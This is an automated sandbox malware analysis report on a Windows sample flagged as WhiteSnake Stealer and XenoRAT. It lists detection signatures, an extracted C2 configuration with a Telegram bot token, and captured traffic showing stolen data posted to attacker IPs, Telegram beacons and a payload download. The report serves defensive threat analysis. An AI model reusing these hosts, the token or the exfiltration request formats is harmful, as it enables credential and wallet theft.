Windows Analysis Report
0LpFv1haTA.exe

Overview

General Information

Sample name: 0LpFv1haTA.exe
renamed because original name is a hash value
Original sample name: 1bafb4856a31ae27271fbd2ee1574a4f.exe
Analysis ID: 1520806
MD5: 1bafb4856a31ae27271fbd2ee1574a4f
SHA1: b8b3649d959524df2c4e8a94434fc0de90f95005
SHA256: 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
Tags: exe, XenoRAT, user-abuse_ch

Detection

WhiteSnake Stealer, XenoRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Yara detected XenoRAT
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Port Forwarding Activity Via SSH.EXE
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

AV Detection

Source: 0LpFv1haTA.exe Avira: detected
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: 41.0.manager.exe.240000.0.unpack Malware Configuration Extractor: XenoRAT {"C2 url": "193.149.187.135", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
Source: 0LpFv1haTA.exe.5500.13.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage"}
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\manager.exe ReversingLabs: Detection: 91%
Source: 0LpFv1haTA.exe ReversingLabs: Detection: 81%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\manager.exe Joe Sandbox ML: detected
Source: 0LpFv1haTA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 7_2_00007FF848F187D1 CryptUnprotectData, 7_2_00007FF848F187D1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F187C1 CryptUnprotectData, 13_2_00007FF848F187C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F1890D CryptUnprotectData, 13_2_00007FF848F1890D
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: 0LpFv1haTA.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: rlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Windows.Forms.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.PDB,D source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Management.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Management.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: rlib.pdba source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.pdb` source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.pdb ` source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.pdb` source: WER895A.tmp.dmp.36.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbh source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.pdbP source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Code function: 4x nop then dec eax 0_2_00007FF848F05453
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1D416h 7_2_00007FF848F1CD0F
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 7_2_00007FF848F165B0
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1E8B0h 7_2_00007FF848F1E0C4
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1DAA9h 7_2_00007FF848F1BB98
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 7_2_00007FF848F216DF
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1DAA9h 7_2_00007FF848F1D59F
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F2055Dh 7_2_00007FF848F20459
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14908h 7_2_00007FF848F14894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14934h 7_2_00007FF848F148F3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1E577h 7_2_00007FF848F1E37C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1DA99h 13_2_00007FF848F1BAE2
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F2C369h 13_2_00007FF848F2C135
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14934h 13_2_00007FF848F14141
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 13_2_00007FF848F1615E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1DA99h 13_2_00007FF848F1B9ED
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F2E654h 13_2_00007FF848F2E49A
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1D20Fh 13_2_00007FF848F1CC9E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1D406h 13_2_00007FF848F1CC9E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F2210Dh 13_2_00007FF848F21E8E
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1E567h 13_2_00007FF848F1DD70
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1E8A0h 13_2_00007FF848F1DD70
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F21648h 13_2_00007FF848F210BE
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 13_2_00007FF848F14F54
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F237F1h 13_2_00007FF848F232C9
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F1DA99h 13_2_00007FF848F1D58F
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F17A3Ch 13_2_00007FF848F17839
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14908h 13_2_00007FF848F14894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 13_2_00007FF848F1FFBF
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 40_2_00007FF848F26DD0
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F27A3Ch 40_2_00007FF848F27858
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F24908h 40_2_00007FF848F24894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F24934h 40_2_00007FF848F248F3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F27A3Ch 40_2_00007FF848F25792
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 40_2_00007FF848F29BF6
Source: C:\Users\user\AppData\Roaming\manager.exe Code function: 4x nop then jmp 023B185Ah 41_2_023B0B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 4x nop then jmp 0322185Ah 42_2_03220B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 4x nop then jmp 0322185Ah 42_2_03220B78
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 4x nop then jmp 00ED185Ah 45_2_00ED0B88
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F34934h 46_2_00007FF848F34141
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 46_2_00007FF848F34F54
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F34908h 46_2_00007FF848F34894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 47_2_00007FF848F166FB
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14934h 47_2_00007FF848F14141
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 47_2_00007FF848F14F54
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14908h 47_2_00007FF848F14894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 47_2_00007FF848F19D36
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F17B7Ch 47_2_00007FF848F17979
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 48_2_00007FF848F16F09
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14908h 48_2_00007FF848F14894
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F14934h 48_2_00007FF848F148F3
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then dec eax 48_2_00007FF848F19D36
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 4x nop then jmp 00007FF848F17B7Ch 48_2_00007FF848F17979

Networking

Source: Network traffic Suricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.5:49711 -> 185.253.7.60:8080
Source: Network traffic Suricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.5:49708 -> 185.253.7.60:8080
Source: Network traffic Suricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.5:49711 -> 185.253.7.60:8080
Source: Network traffic Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49738 -> 45.82.65.63:80
Source: Network traffic Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49739 -> 188.120.242.78:8817
Source: Network traffic Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49729 -> 167.99.138.249:8080
Source: Network traffic Suricata IDS: 2045868 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) : 192.168.2.5:49737 -> 206.189.109.146:80
Source: Network traffic Suricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.5:49708 -> 185.253.7.60:8080
Source: Network traffic Suricata IDS: 2045869 - Severity 1 - ET MALWARE WhiteSnake Stealer Telegram Checkin : 192.168.2.5:49740 -> 149.154.167.220:443
Source: Malware configuration extractor URLs: 193.149.187.135
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 8817
Source: unknown Network traffic detected: HTTP traffic on port 8817 -> 49739
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 0LpFv1haTA.exe, type: SAMPLE
Source: Yara match File source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, type: DROPPED
Source: global traffic TCP traffic: 192.168.2.5:49708 -> 185.253.7.60:8080
Source: global traffic TCP traffic: 192.168.2.5:49729 -> 167.99.138.249:8080
Source: global traffic TCP traffic: 192.168.2.5:49739 -> 188.120.242.78:8817
Source: global traffic TCP traffic: 192.168.2.5:49744 -> 193.149.187.135:4444
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 21:28:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Sep 2024 18:44:49 GMTETag: "cc00-622b9aabbea40"Accept-Ranges: bytesContent-Length: 52224Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1Host: 185.253.7.60:8080Content-Length: 135595Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1Host: 185.253.7.60:8080Content-Length: 140694Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /manager.exe HTTP/1.1Host: 185.80.128.17Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1Host: 185.253.7.60:8080Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View ASN Name: THEFIRST-ASRU THEFIRST-ASRU
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: ip-api.com
Source: unknown TCP traffic detected without corresponding DNS query: 185.253.7.60
Source: global traffic HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F0bdcbb891d3c57c2a3bd914febf5955f.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /manager.exe HTTP/1.1 Host: 185.80.128.17 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1 Host: 185.253.7.60:8080 Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: serveo.net
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1 Host: 185.253.7.60:8080 Content-Length: 135595 Expect: 100-continue Connection: Keep-Alive
Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://107.161.20.142:8080
